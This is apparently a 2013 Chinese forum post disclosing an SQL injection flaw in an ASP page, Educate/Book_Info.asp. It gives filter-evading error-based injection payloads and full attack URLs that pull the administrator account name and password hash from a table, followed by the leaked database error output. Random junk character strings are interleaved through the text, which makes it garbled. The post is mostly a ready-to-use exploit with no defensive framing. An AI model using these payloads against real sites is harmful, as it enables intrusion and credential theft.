漏洞出现在Educate/Book_Info.asp
+ a' H1 x9 {2 }, L3 H( t" J! H ) w I- f5 W% D) u3 R! Z
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
- @. A% o2 M: S
1 l j7 }, y! s, o$ c% f2 b4 @exp:如下
5 g/ G9 Y: }9 ]3 I: l查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)" ^$ T2 o1 v2 X" h
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; q' K8 ?; e. ]( X( i3 _, l) r
% @8 S# a$ h" I% |- F, r' lhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
8 e% F M3 ` D2 p. `* H
' y( ~: {+ }- \: UMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
$ p% T, U5 l4 u3 c$ | n5 _
; @+ B. i1 u0 a# w: c- {% T0 D将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. X w4 ?9 Y8 V* `8 `5 {
g n3 r* q2 h2 R! o0 M Q
/Educate/Book_Info.asp,行 86 X0 ?2 z2 V5 Y; _, d; e8 N- `
) g* T1 B' f$ i/ A/ phttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# [0 A( M( X5 }; ]4 K
- l4 {8 L8 R! w5 r+ T/ n h" OMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
' U9 V4 Y( n$ Y. J3 r# X
: ~0 G5 O, y0 d0 V3 ]将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
/ d/ b0 r( k M2 c6 ?
) ?5 A* [7 U0 i0 Q6 j( S/Educate/Book_Info.asp,行 81 k$ H/ `9 B7 e2 C1 Z4 d
|
发表于 2013-2-16 21:44:16
收藏
支持
反对